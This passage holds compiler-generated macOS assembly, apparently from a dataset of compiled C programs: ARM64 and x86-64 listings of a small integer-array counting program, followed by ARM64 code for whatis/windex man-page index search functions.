Reload ldur w9, [x29, #-20] ; kill: def $x9 killed $w9 ldr w8, [x8, x9, lsl #2] subs w8, w8, #0 cset w8, ls tbnz w8, #0, LBB0_15 b LBB0_11 LBB0_11: ; in Loop: Header=BB0_5 Depth=1 ldur x8, [x29, #-88] ; 8-byte Folded Reload ldur w9, [x29, #-20] ; kill: def $x9 killed $w9 ldr w8, [x8, x9, lsl #2] mov w10, #2 udiv w9, w8, w10 mul w9, w9, w10 subs w8, w8, w9 subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB0_13 b LBB0_12 LBB0_12: ; in Loop: Header=BB0_5 Depth=1 ldur x8, [x29, #-88] ; 8-byte Folded Reload ldur w9, [x29, #-20] ; kill: def $x9 killed $w9 mov x10, x9 add w10, w10, #1 stur w10, [x29, #-20] add x9, x8, x9, lsl #2 ldr w8, [x9] subs w8, w8, #1 str w8, [x9] b LBB0_14 LBB0_13: ; in Loop: Header=BB0_5 Depth=1 ldur x8, [x29, #-88] ; 8-byte Folded Reload ldur w9, [x29, #-20] ; kill: def $x9 killed $w9 mov x10, x9 subs w10, w10, #1 stur w10, [x29, #-20] add x9, x8, x9, lsl #2 ldr w8, [x9] subs w8, w8, #1 str w8, [x9] b LBB0_14 LBB0_14: ; in Loop: Header=BB0_5 Depth=1 ldur x8, [x29, #-40] add x8, x8, #1 stur x8, [x29, #-40] b LBB0_16 LBB0_15: ; in Loop: Header=BB0_5 Depth=1 ldur w8, [x29, #-20] subs w8, w8, #1 stur w8, [x29, #-20] b LBB0_16 LBB0_16: ; in Loop: Header=BB0_5 Depth=1 b LBB0_5 LBB0_17: ldur w8, [x29, #-24] ; implicit-def: $x10 mov x10, x8 ldur x8, [x29, #-32] ldur x9, [x29, #-40] subs x8, x8, x9 sub sp, sp, #16 mov x9, sp str x10, [x9] str x8, [x9, #8] adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf add sp, sp, #16 stur wzr, [x29, #-12] ldur x8, [x29, #-48] mov sp, x8 ldur w8, [x29, #-12] stur w8, [x29, #-104] ; 4-byte Folded Spill ldur x9, [x29, #-8] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_19 b LBB0_18 LBB0_18: bl ___stack_chk_fail LBB0_19: ldur w0, [x29, #-104] ; 4-byte Folded Reload mov sp, x29 ldp x29, x30, [sp], #16 ; 16-byte Folded Reload ret .cfi_endproc ; -- End function .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%u" l_.str.1: ; @.str.1 .asciz "%u %llu\n" .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _main ## -- Begin function main .p2align 4, 0x90 _main: ## @main .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $112, %rsp movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq %rax, -8(%rbp) movl $0, -12(%rbp) movl $0, -24(%rbp) movq $0, -32(%rbp) movq $0, -40(%rbp) leaq L_.str(%rip), %rdi xorl %eax, %eax ## kill: def $al killed $al killed $eax leaq -16(%rbp), %rsi callq _scanf movl -16(%rbp), %eax ## kill: def $rax killed $eax movq %rax, -96(%rbp) ## 8-byte Spill movq %rsp, %rcx movq %rcx, -48(%rbp) shlq $2, %rax callq ____chkstk_darwin addq $15, %rax andq $-16, %rax subq %rax, %rsp movq -96(%rbp), %rax ## 8-byte Reload movq %rsp, %rcx movq %rcx, -88(%rbp) ## 8-byte Spill movq %rax, -56(%rbp) movl -16(%rbp), %eax ## kill: def $rax killed $eax movq %rax, -80(%rbp) ## 8-byte Spill callq ____chkstk_darwin addq $15, %rax andq $-16, %rax subq %rax, %rsp movq -80(%rbp), %rax ## 8-byte Reload movq %rsp, %rcx movq %rcx, -72(%rbp) ## 8-byte Spill movq %rax, -64(%rbp) movl $0, -20(%rbp) LBB0_1: ## =>This Inner Loop Header: Depth=1 movl -20(%rbp), %eax cmpl -16(%rbp), %eax jae LBB0_4 ## %bb.2: ## in Loop: Header=BB0_1 Depth=1 movq -88(%rbp), %rsi ## 8-byte Reload movl -20(%rbp), %eax ## kill: def $rax killed $eax shlq $2, %rax addq %rax, %rsi leaq L_.str(%rip), %rdi movb $0, %al callq _scanf movq -88(%rbp), %rcx ## 8-byte Reload ## kill: def $edx killed $eax movq -72(%rbp), %rax ## 8-byte Reload movl -20(%rbp), %edx ## kill: def $rdx killed $edx movl (%rcx,%rdx,4), %ecx ## kill: def $rcx killed $ecx addq -32(%rbp), %rcx movq %rcx, -32(%rbp) movl -20(%rbp), %ecx ## kill: def $rcx killed $ecx movb $0, (%rax,%rcx) ## %bb.3: ## in Loop: Header=BB0_1 Depth=1 movl -20(%rbp), %eax addl $1, %eax movl %eax, -20(%rbp) jmp LBB0_1 LBB0_4: movl $0, -20(%rbp) LBB0_5: ## =>This Inner Loop Header: Depth=1 xorl %eax, %eax ## kill: def $al killed $al killed $eax cmpl $-1, -20(%rbp) movb %al, -97(%rbp) ## 1-byte Spill je LBB0_7 ## %bb.6: ## in Loop: Header=BB0_5 Depth=1 movl -20(%rbp), %eax cmpl -16(%rbp), %eax setb %al movb %al, -97(%rbp) ## 1-byte Spill LBB0_7: ## in Loop: Header=BB0_5 Depth=1 movb -97(%rbp), %al ## 1-byte Reload testb $1, %al jne LBB0_8 jmp LBB0_17 LBB0_8: ## in Loop: Header=BB0_5 Depth=1 movq -72(%rbp), %rax ## 8-byte Reload movl -20(%rbp), %ecx ## kill: def $rcx killed $ecx movzbl (%rax,%rcx), %eax cmpl $0, %eax jne LBB0_10 ## %bb.9: ## in Loop: Header=BB0_5 Depth=1 movq -72(%rbp), %rax ## 8-byte Reload movl -24(%rbp), %ecx addl $1, %ecx movl %ecx, -24(%rbp) movl -20(%rbp), %ecx ## kill: def $rcx killed $ecx movb $1, (%rax,%rcx) LBB0_10: ## in Loop: Header=BB0_5 Depth=1 movq -88(%rbp), %rax ## 8-byte Reload movl -20(%rbp), %ecx ## kill: def $rcx killed $ecx cmpl $0, (%rax,%rcx,4) jbe LBB0_15 ## %bb.11: ## in Loop: Header=BB0_5 Depth=1 movq -88(%rbp), %rax ## 8-byte Reload movl -20(%rbp), %ecx ## kill: def $rcx killed $ecx movl (%rax,%rcx,4), %eax andl $1, %eax cmpl $0, %eax je LBB0_13 ## %bb.12: ## in Loop: Header=BB0_5 Depth=1 movq -88(%rbp), %rax ## 8-byte Reload movl -20(%rbp), %ecx movl %ecx, %edx addl $1, %edx movl %edx, -20(%rbp) movl %ecx, %ecx ## kill: def $rcx killed $ecx movl (%rax,%rcx,4), %edx addl $-1, %edx movl %edx, (%rax,%rcx,4) jmp LBB0_14 LBB0_13: ## in Loop: Header=BB0_5 Depth=1 movq -88(%rbp), %rax ## 8-byte Reload movl -20(%rbp), %ecx movl %ecx, %edx addl $-1, %edx movl %edx, -20(%rbp) movl %ecx, %ecx ## kill: def $rcx killed $ecx movl (%rax,%rcx,4), %edx addl $-1, %edx movl %edx, (%rax,%rcx,4) LBB0_14: ## in Loop: Header=BB0_5 Depth=1 movq -40(%rbp), %rax addq $1, %rax movq %rax, -40(%rbp) jmp LBB0_16 LBB0_15: ## in Loop: Header=BB0_5 Depth=1 movl -20(%rbp), %eax addl $-1, %eax movl %eax, -20(%rbp) LBB0_16: ## in Loop: Header=BB0_5 Depth=1 jmp LBB0_5 LBB0_17: movl -24(%rbp), %esi movq -32(%rbp), %rdx subq -40(%rbp), %rdx leaq L_.str.1(%rip), %rdi movb $0, %al callq _printf movl $0, -12(%rbp) movq -48(%rbp), %rax movq %rax, %rsp movl -12(%rbp), %eax movl %eax, -104(%rbp) ## 4-byte Spill movq ___stack_chk_guard@GOTPCREL(%rip), %rax movq (%rax), %rax movq -8(%rbp), %rcx cmpq %rcx, %rax jne LBB0_19 ## %bb.18: movl -104(%rbp), %eax ## 4-byte Reload movq %rbp, %rsp popq %rbp retq LBB0_19: callq ___stack_chk_fail ud2 .cfi_endproc ## -- End function .section __TEXT,__cstring,cstring_literals L_.str: ## @.str .asciz "%u" L_.str.1: ## @.str.1 .asciz "%u %llu\n" .subsections_via_symbols
the_stack_data/48674.c
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _searchwhatis ; -- Begin function searchwhatis .p2align 2 _searchwhatis: ; @searchwhatis .cfi_startproc ; %bb.0: sub sp, sp, #400 .cfi_def_cfa_offset 400 stp x28, x27, [sp, #368] ; 16-byte Folded Spill stp x29, x30, [sp, #384] ; 16-byte Folded Spill add x29, sp, #384 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 adrp x8, _searchwhatis.section@PAGE add x8, x8, _searchwhatis.section@PAGEOFF add x8, x8, #31 str x8, [sp, #32] ; 8-byte Folded Spill adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-24] str x0, [sp, #96] str x1, [sp, #88] str x2, [sp, #80] str x3, [sp, #72] str wzr, [sp, #68] b LBB0_1 LBB0_1: ; =>This Loop Header: Depth=1 ; Child Loop BB0_2 Depth 2 ; Child Loop BB0_3 Depth 3 ; Child Loop BB0_9 Depth 3 ; Child Loop BB0_31 Depth 2 ; Child Loop BB0_46 Depth 2 mov w8, #1 str w8, [sp, #60] adrp x8, _searchwhatis.section@PAGE add x8, x8, _searchwhatis.section@PAGEOFF str x8, [sp, #48] ldr x0, [sp, #96] bl _fgetc str w0, [sp, #64] b LBB0_2 LBB0_2: ; Parent Loop BB0_1 Depth=1 ; => This Loop Header: Depth=2 ; Child Loop BB0_3 Depth 3 ; Child Loop BB0_9 Depth 3 add x8, sp, #104 str x8, [sp, #40] b LBB0_3 LBB0_3: ; Parent Loop BB0_1 Depth=1 ; Parent Loop BB0_2 Depth=2 ; => This Inner Loop Header: Depth=3 ldr w8, [sp, #64] subs w8, w8, #32 cset w8, eq mov w9, #1 str w9, [sp, #28] ; 4-byte Folded Spill tbnz w8, #0, LBB0_6 b LBB0_4 LBB0_4: ; in Loop: Header=BB0_3 Depth=3 ldr w8, [sp, #64] subs w8, w8, #9 cset w8, eq mov w9, #1 str w9, [sp, #28] ; 4-byte Folded Spill tbnz w8, #0, LBB0_6 b LBB0_5 LBB0_5: ; in Loop: Header=BB0_3 Depth=3 ldr w8, [sp, #64] subs w8, w8, #44 cset w8, eq str w8, [sp, #28] ; 4-byte Folded Spill b LBB0_6 LBB0_6: ; in Loop: Header=BB0_3 Depth=3 ldr w8, [sp, #28] ; 4-byte Folded Reload tbz w8, #0, LBB0_8 b LBB0_7 LBB0_7: ; in Loop: Header=BB0_3 Depth=3 ldr x0, [sp, #96] bl _fgetc str w0, [sp, #64] b LBB0_3 LBB0_8: ; in Loop: Header=BB0_2 Depth=2 b LBB0_9 LBB0_9: ; Parent Loop BB0_1 Depth=1 ; Parent Loop BB0_2 Depth=2 ; => This Inner Loop Header: Depth=3 ldr w8, [sp, #64] subs w8, w8, #32 cset w8, eq mov w9, #0 str w9, [sp, #24] ; 4-byte Folded Spill tbnz w8, #0, LBB0_15 b LBB0_10 LBB0_10: ; in Loop: Header=BB0_9 Depth=3 ldr w8, [sp, #64] subs w8, w8, #9 cset w8, eq mov w9, #0 str w9, [sp, #24] ; 4-byte Folded Spill tbnz w8, #0, LBB0_15 b LBB0_11 LBB0_11: ; in Loop: Header=BB0_9 Depth=3 ldr w8, [sp, #64] subs w8, w8, #44 cset w8, eq mov w9, #0 str w9, [sp, #24] ; 4-byte Folded Spill tbnz w8, #0, LBB0_15 b LBB0_12 LBB0_12: ; in Loop: Header=BB0_9 Depth=3 ldr w8, [sp, #64] subs w8, w8, #40 cset w8, eq mov w9, #0 str w9, [sp, #24] ; 4-byte Folded Spill tbnz w8, #0, LBB0_15 b LBB0_13 LBB0_13: ; in Loop: Header=BB0_9 Depth=3 ldr w8, [sp, #64] subs w8, w8, #10 cset w8, eq mov w9, #0 str w9, [sp, #24] ; 4-byte Folded Spill tbnz w8, #0, LBB0_15 b LBB0_14 LBB0_14: ; in Loop: Header=BB0_9 Depth=3 ldr w8, [sp, #64] adds w8, w8, #1 cset w8, ne str w8, [sp, #24] ; 4-byte Folded Spill b LBB0_15 LBB0_15: ; in Loop: Header=BB0_9 Depth=3 ldr w8, [sp, #24] ; 4-byte Folded Reload tbz w8, #0, LBB0_19 b LBB0_16 LBB0_16: ; in Loop: Header=BB0_9 Depth=3 ldr x8, [sp, #40] add x9, sp, #104 add x9, x9, #255 subs x8, x8, x9 cset w8, hs tbnz w8, #0, LBB0_18 b LBB0_17 LBB0_17: ; in Loop: Header=BB0_9 Depth=3 ldr w8, [sp, #64] ldr x9, [sp, #40] add x10, x9, #1 str x10, [sp, #40] strb w8, [x9] b LBB0_18 LBB0_18: ; in Loop: Header=BB0_9 Depth=3 ldr x0, [sp, #96] bl _getc str w0, [sp, #64] b LBB0_9 LBB0_19: ; in Loop: Header=BB0_2 Depth=2 ldr x8, [sp, #40] strb wzr, [x8] ldr w8, [sp, #60] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB0_21 b LBB0_20 LBB0_20: ; in Loop: Header=BB0_2 Depth=2 adrp x0, _searchwhatis.page@PAGE add x0, x0, _searchwhatis.page@PAGEOFF add x1, sp, #104 mov x2, #256 bl ___strcpy_chk str wzr, [sp, #60] b LBB0_21 LBB0_21: ; in Loop: Header=BB0_2 Depth=2 ldr x1, [sp, #88] add x0, sp, #104 bl _strcmp subs w8, w0, #0 cset w8, ne tbnz w8, #0, LBB0_23 b LBB0_22 LBB0_22: ; in Loop: Header=BB0_2 Depth=2 mov w8, #1 str w8, [sp, #68] b LBB0_23 LBB0_23: ; in Loop: Header=BB0_2 Depth=2 b LBB0_24 LBB0_24: ; in Loop: Header=BB0_2 Depth=2 ldr w8, [sp, #64] subs w8, w8, #40 cset w8, eq mov w9, #0 str w9, [sp, #20] ; 4-byte Folded Spill tbnz w8, #0, LBB0_27 b LBB0_25 LBB0_25: ; in Loop: Header=BB0_2 Depth=2 ldr w8, [sp, #64] subs w8, w8, #10 cset w8, eq mov w9, #0 str w9, [sp, #20] ; 4-byte Folded Spill tbnz w8, #0, LBB0_27 b LBB0_26 LBB0_26: ; in Loop: Header=BB0_2 Depth=2 ldr w8, [sp, #64] adds w8, w8, #1 cset w8, ne str w8, [sp, #20] ; 4-byte Folded Spill b LBB0_27 LBB0_27: ; in Loop: Header=BB0_2 Depth=2 ldr w8, [sp, #20] ; 4-byte Folded Reload tbnz w8, #0, LBB0_2 b LBB0_28 LBB0_28: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #64] subs w8, w8, #40 cset w8, eq tbnz w8, #0, LBB0_30 b LBB0_29 LBB0_29: ; in Loop: Header=BB0_1 Depth=1 str wzr, [sp, #68] b LBB0_45 LBB0_30: ; in Loop: Header=BB0_1 Depth=1 b LBB0_31 LBB0_31: ; Parent Loop BB0_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr x0, [sp, #96] bl _fgetc str w0, [sp, #64] subs w8, w0, #41 cset w8, eq mov w9, #0 str w9, [sp, #16] ; 4-byte Folded Spill tbnz w8, #0, LBB0_34 b LBB0_32 LBB0_32: ; in Loop: Header=BB0_31 Depth=2 ldr w8, [sp, #64] subs w8, w8, #10 cset w8, eq mov w9, #0 str w9, [sp, #16] ; 4-byte Folded Spill tbnz w8, #0, LBB0_34 b LBB0_33 LBB0_33: ; in Loop: Header=BB0_31 Depth=2 ldr w8, [sp, #64] adds w8, w8, #1 cset w8, ne str w8, [sp, #16] ; 4-byte Folded Spill b LBB0_34 LBB0_34: ; in Loop: Header=BB0_31 Depth=2 ldr w8, [sp, #16] ; 4-byte Folded Reload tbz w8, #0, LBB0_41 b LBB0_35 LBB0_35: ; in Loop: Header=BB0_31 Depth=2 ldr w9, [sp, #64] mov w8, #65 subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB0_38 b LBB0_36 LBB0_36: ; in Loop: Header=BB0_31 Depth=2 ldr w8, [sp, #64] subs w8, w8, #90 cset w8, gt tbnz w8, #0, LBB0_38 b LBB0_37 LBB0_37: ; in Loop: Header=BB0_31 Depth=2 ldr w8, [sp, #64] subs w8, w8, #65 add w8, w8, #97 str w8, [sp, #64] b LBB0_38 LBB0_38: ; in Loop: Header=BB0_31 Depth=2 ldr x9, [sp, #32] ; 8-byte Folded Reload ldr x8, [sp, #48] subs x8, x8, x9 cset w8, hs tbnz w8, #0, LBB0_40 b LBB0_39 LBB0_39: ; in Loop: Header=BB0_31 Depth=2 ldr w8, [sp, #64] ldr x9, [sp, #48] add x10, x9, #1 str x10, [sp, #48] strb w8, [x9] b LBB0_40 LBB0_40: ; in Loop: Header=BB0_31 Depth=2 b LBB0_31 LBB0_41: ; in Loop: Header=BB0_1 Depth=1 ldr x8, [sp, #48] strb wzr, [x8] ldr w8, [sp, #64] subs w8, w8, #41 cset w8, ne tbnz w8, #0, LBB0_43 b LBB0_42 LBB0_42: ; in Loop: Header=BB0_1 Depth=1 ldr x8, [sp, #48] adrp x9, _searchwhatis.section@PAGE add x9, x9, _searchwhatis.section@PAGEOFF subs x8, x8, x9 cset w8, ne tbnz w8, #0, LBB0_44 b LBB0_43 LBB0_43: ; in Loop: Header=BB0_1 Depth=1 str wzr, [sp, #68] b LBB0_44 LBB0_44: ; in Loop: Header=BB0_1 Depth=1 b LBB0_45 LBB0_45: ; in Loop: Header=BB0_1 Depth=1 b LBB0_46 LBB0_46: ; Parent Loop BB0_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #64] adds w8, w8, #1 cset w8, eq mov w9, #0 str w9, [sp, #12] ; 4-byte Folded Spill tbnz w8, #0, LBB0_48 b LBB0_47 LBB0_47: ; in Loop: Header=BB0_46 Depth=2 ldr w8, [sp, #64] subs w8, w8, #10 cset w8, ne str w8, [sp, #12] ; 4-byte Folded Spill b LBB0_48 LBB0_48: ; in Loop: Header=BB0_46 Depth=2 ldr w8, [sp, #12] ; 4-byte Folded Reload tbz w8, #0, LBB0_50 b LBB0_49 LBB0_49: ; in Loop: Header=BB0_46 Depth=2 ldr x0, [sp, #96] bl _getc str w0, [sp, #64] b LBB0_46 LBB0_50: ; in Loop: Header=BB0_1 Depth=1 b LBB0_51 LBB0_51: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #68] subs w8, w8, #0 cset w8, ne mov w9, #0 str w9, [sp, #8] ; 4-byte Folded Spill tbnz w8, #0, LBB0_53 b LBB0_52 LBB0_52: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #64] adds w8, w8, #1 cset w8, ne str w8, [sp, #8] ; 4-byte Folded Spill b LBB0_53 LBB0_53: ; in Loop: Header=BB0_1 Depth=1 ldr w8, [sp, #8] ; 4-byte Folded Reload tbnz w8, #0, LBB0_1 b LBB0_54 LBB0_54: ldr w8, [sp, #68] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB0_56 b LBB0_55 LBB0_55: ldr x9, [sp, #80] adrp x8, _searchwhatis.page@PAGE add x8, x8, _searchwhatis.page@PAGEOFF str x8, [x9] ldr x9, [sp, #72] adrp x8, _searchwhatis.section@PAGE add x8, x8, _searchwhatis.section@PAGEOFF str x8, [x9] b LBB0_56 LBB0_56: ldr w8, [sp, #64] adds w8, w8, #1 cset w8, ne tbnz w8, #0, LBB0_58 b LBB0_57 LBB0_57: mov w8, #-1 str w8, [sp, #4] ; 4-byte Folded Spill b LBB0_59 LBB0_58: ldr w8, [sp, #68] str w8, [sp, #4] ; 4-byte Folded Spill b LBB0_59 LBB0_59: ldr w8, [sp, #4] ; 4-byte Folded Reload str w8, [sp] ; 4-byte Folded Spill ldur x9, [x29, #-24] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB0_61 b LBB0_60 LBB0_60: bl ___stack_chk_fail LBB0_61: ldr w0, [sp] ; 4-byte Folded Reload ldp x29, x30, [sp, #384] ; 16-byte Folded Reload ldp x28, x27, [sp, #368] ; 16-byte Folded Reload add sp, sp, #400 ret .cfi_endproc ; -- End function .globl _searchwindex ; -- Begin function searchwindex .p2align 2 _searchwindex: ; @searchwindex .cfi_startproc ; %bb.0: sub sp, sp, #144 .cfi_def_cfa_offset 144 stp x29, x30, [sp, #128] ; 16-byte Folded Spill add x29, sp, #128 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 adrp x8, _searchwindex.section@PAGE add x8, x8, _searchwindex.section@PAGEOFF add x8, x8, #31 str x8, [sp, #32] ; 8-byte Folded Spill adrp x8, _searchwindex.page@PAGE add x8, x8, _searchwindex.page@PAGEOFF add x8, x8, #255 str x8, [sp, #40] ; 8-byte Folded Spill stur x0, [x29, #-16] stur x1, [x29, #-24] stur x2, [x29, #-32] stur x3, [x29, #-40] ldur x0, [x29, #-16] bl _ftell subs x8, x0, #0 cset w8, ne tbnz w8, #0, LBB1_2 b LBB1_1 LBB1_1: adrp x8, _searchwindex.low@PAGE mov x1, #0 str xzr, [x8, _searchwindex.low@PAGEOFF] ldur x0, [x29, #-16] mov w2, #2 bl _fseek ldur x0, [x29, #-16] bl _ftell adrp x8, _searchwindex.high@PAGE str x0, [x8, _searchwindex.high@PAGEOFF] b LBB1_2 LBB1_2: b LBB1_3 LBB1_3: ; =>This Loop Header: Depth=1 ; Child Loop BB1_11 Depth 2 ; Child Loop BB1_19 Depth 2 adrp x8, _searchwindex.low@PAGE ldr x8, [x8, _searchwindex.low@PAGEOFF] adrp x9, _searchwindex.high@PAGE ldr x9, [x9, _searchwindex.high@PAGEOFF] subs x8, x8, x9 cset w8, gt tbnz w8, #0, LBB1_31 b LBB1_4 LBB1_4: ; in Loop: Header=BB1_3 Depth=1 ldur x8, [x29, #-24] str x8, [sp, #56] adrp x8, _searchwindex.low@PAGE ldr x8, [x8, _searchwindex.low@PAGEOFF] adrp x9, _searchwindex.high@PAGE ldr x9, [x9, _searchwindex.high@PAGEOFF] add x8, x8, x9 asr x8, x8, #1 stur x8, [x29, #-56] stur x8, [x29, #-48] ldur x8, [x29, #-48] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB1_8 b LBB1_5 LBB1_5: ; in Loop: Header=BB1_3 Depth=1 ldur x0, [x29, #-16] mov x1, #0 mov w2, #0 bl _fseek subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_7 b LBB1_6 LBB1_6: mov w8, #-1 stur w8, [x29, #-4] b LBB1_103 LBB1_7: ; in Loop: Header=BB1_3 Depth=1 b LBB1_18 LBB1_8: ; in Loop: Header=BB1_3 Depth=1 ldur x0, [x29, #-16] ldur x8, [x29, #-48] subs x1, x8, #1 mov w2, #0 bl _fseek subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_10 b LBB1_9 LBB1_9: mov w8, #-1 stur w8, [x29, #-4] b LBB1_103 LBB1_10: ; in Loop: Header=BB1_3 Depth=1 b LBB1_11 LBB1_11: ; Parent Loop BB1_3 Depth=1 ; => This Inner Loop Header: Depth=2 ldur x0, [x29, #-16] bl _getc stur w0, [x29, #-60] adds w8, w0, #1 cset w8, eq mov w9, #0 str w9, [sp, #28] ; 4-byte Folded Spill tbnz w8, #0, LBB1_13 b LBB1_12 LBB1_12: ; in Loop: Header=BB1_11 Depth=2 ldur w8, [x29, #-60] subs w8, w8, #10 cset w8, ne str w8, [sp, #28] ; 4-byte Folded Spill b LBB1_13 LBB1_13: ; in Loop: Header=BB1_11 Depth=2 ldr w8, [sp, #28] ; 4-byte Folded Reload tbz w8, #0, LBB1_15 b LBB1_14 LBB1_14: ; in Loop: Header=BB1_11 Depth=2 ldur x8, [x29, #-56] add x8, x8, #1 stur x8, [x29, #-56] b LBB1_11 LBB1_15: ; in Loop: Header=BB1_3 Depth=1 ldur x0, [x29, #-16] bl _ferror subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_17 b LBB1_16 LBB1_16: mov w8, #-1 stur w8, [x29, #-4] b LBB1_103 LBB1_17: ; in Loop: Header=BB1_3 Depth=1 b LBB1_18 LBB1_18: ; in Loop: Header=BB1_3 Depth=1 b LBB1_19 LBB1_19: ; Parent Loop BB1_3 Depth=1 ; => This Inner Loop Header: Depth=2 ldur x0, [x29, #-16] bl _getc stur w0, [x29, #-60] subs w8, w0, #32 cset w8, eq tbnz w8, #0, LBB1_21 b LBB1_20 LBB1_20: ; in Loop: Header=BB1_19 Depth=2 ldur w8, [x29, #-60] subs w8, w8, #9 cset w8, ne tbnz w8, #0, LBB1_22 b LBB1_21 LBB1_21: ; in Loop: Header=BB1_19 Depth=2 stur wzr, [x29, #-60] b LBB1_22 LBB1_22: ; in Loop: Header=BB1_19 Depth=2 ldur w8, [x29, #-60] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB1_24 b LBB1_23 LBB1_23: ; in Loop: Header=BB1_19 Depth=2 ldur w8, [x29, #-60] ldr x9, [sp, #56] ldrb w9, [x9] subs w8, w8, w9 cset w8, eq tbnz w8, #0, LBB1_25 b LBB1_24 LBB1_24: ; in Loop: Header=BB1_3 Depth=1 b LBB1_26 LBB1_25: ; in Loop: Header=BB1_19 Depth=2 ldr x8, [sp, #56] add x8, x8, #1 str x8, [sp, #56] b LBB1_19 LBB1_26: ; in Loop: Header=BB1_3 Depth=1 ldur w8, [x29, #-60] adds w8, w8, #1 cset w8, eq tbnz w8, #0, LBB1_28 b LBB1_27 LBB1_27: ; in Loop: Header=BB1_3 Depth=1 ldr x8, [sp, #56] ldrb w8, [x8] ldur w9, [x29, #-60] subs w8, w8, w9 cset w8, gt tbnz w8, #0, LBB1_29 b LBB1_28 LBB1_28: ; in Loop: Header=BB1_3 Depth=1 ldur x8, [x29, #-48] subs x8, x8, #1 adrp x9, _searchwindex.high@PAGE str x8, [x9, _searchwindex.high@PAGEOFF] b LBB1_30 LBB1_29: ; in Loop: Header=BB1_3 Depth=1 ldur x8, [x29, #-56] add x8, x8, #1 adrp x9, _searchwindex.low@PAGE str x8, [x9, _searchwindex.low@PAGEOFF] b LBB1_30 LBB1_30: ; in Loop: Header=BB1_3 Depth=1 b LBB1_3 LBB1_31: ldur x0, [x29, #-16] adrp x8, _searchwindex.low@PAGE ldr x1, [x8, _searchwindex.low@PAGEOFF] mov w2, #0 bl _fseek subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_33 b LBB1_32 LBB1_32: mov w8, #-1 stur w8, [x29, #-4] b LBB1_103 LBB1_33: b LBB1_34 LBB1_34: ; =>This Loop Header: Depth=1 ; Child Loop BB1_36 Depth 2 ; Child Loop BB1_44 Depth 2 adrp x8, _searchwindex.low@PAGE ldr x8, [x8, _searchwindex.low@PAGEOFF] subs x8, x8, #0 cset w8, eq tbnz w8, #0, LBB1_43 b LBB1_35 LBB1_35: ; in Loop: Header=BB1_34 Depth=1 b LBB1_36 LBB1_36: ; Parent Loop BB1_34 Depth=1 ; => This Inner Loop Header: Depth=2 ldur x0, [x29, #-16] bl _getc stur w0, [x29, #-60] adds w8, w0, #1 cset w8, eq mov w9, #0 str w9, [sp, #24] ; 4-byte Folded Spill tbnz w8, #0, LBB1_38 b LBB1_37 LBB1_37: ; in Loop: Header=BB1_36 Depth=2 ldur w8, [x29, #-60] subs w8, w8, #10 cset w8, ne str w8, [sp, #24] ; 4-byte Folded Spill b LBB1_38 LBB1_38: ; in Loop: Header=BB1_36 Depth=2 ldr w8, [sp, #24] ; 4-byte Folded Reload tbz w8, #0, LBB1_40 b LBB1_39 LBB1_39: ; in Loop: Header=BB1_36 Depth=2 adrp x9, _searchwindex.low@PAGE ldr x8, [x9, _searchwindex.low@PAGEOFF] add x8, x8, #1 str x8, [x9, _searchwindex.low@PAGEOFF] b LBB1_36 LBB1_40: ; in Loop: Header=BB1_34 Depth=1 ldur x0, [x29, #-16] bl _ferror subs w8, w0, #0 cset w8, eq tbnz w8, #0, LBB1_42 b LBB1_41 LBB1_41: mov w8, #-1 stur w8, [x29, #-4] b LBB1_103 LBB1_42: ; in Loop: Header=BB1_34 Depth=1 b LBB1_43 LBB1_43: ; in Loop: Header=BB1_34 Depth=1 ldur x8, [x29, #-24] str x8, [sp, #56] b LBB1_44 LBB1_44: ; Parent Loop BB1_34 Depth=1 ; => This Inner Loop Header: Depth=2 ldur x0, [x29, #-16] bl _getc stur w0, [x29, #-60] adds w8, w0, #1 cset w8, ne tbnz w8, #0, LBB1_46 b LBB1_45 LBB1_45: stur wzr, [x29, #-4] b LBB1_103 LBB1_46: ; in Loop: Header=BB1_44 Depth=2 adrp x9, _searchwindex.low@PAGE ldr x8, [x9, _searchwindex.low@PAGEOFF] add x8, x8, #1 str x8, [x9, _searchwindex.low@PAGEOFF] ldur w8, [x29, #-60] subs w8, w8, #32 cset w8, eq tbnz w8, #0, LBB1_48 b LBB1_47 LBB1_47: ; in Loop: Header=BB1_44 Depth=2 ldur w8, [x29, #-60] subs w8, w8, #9 cset w8, ne tbnz w8, #0, LBB1_49 b LBB1_48 LBB1_48: ; in Loop: Header=BB1_44 Depth=2 stur wzr, [x29, #-60] b LBB1_49 LBB1_49: ; in Loop: Header=BB1_44 Depth=2 ldur w8, [x29, #-60] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB1_51 b LBB1_50 LBB1_50: ; in Loop: Header=BB1_44 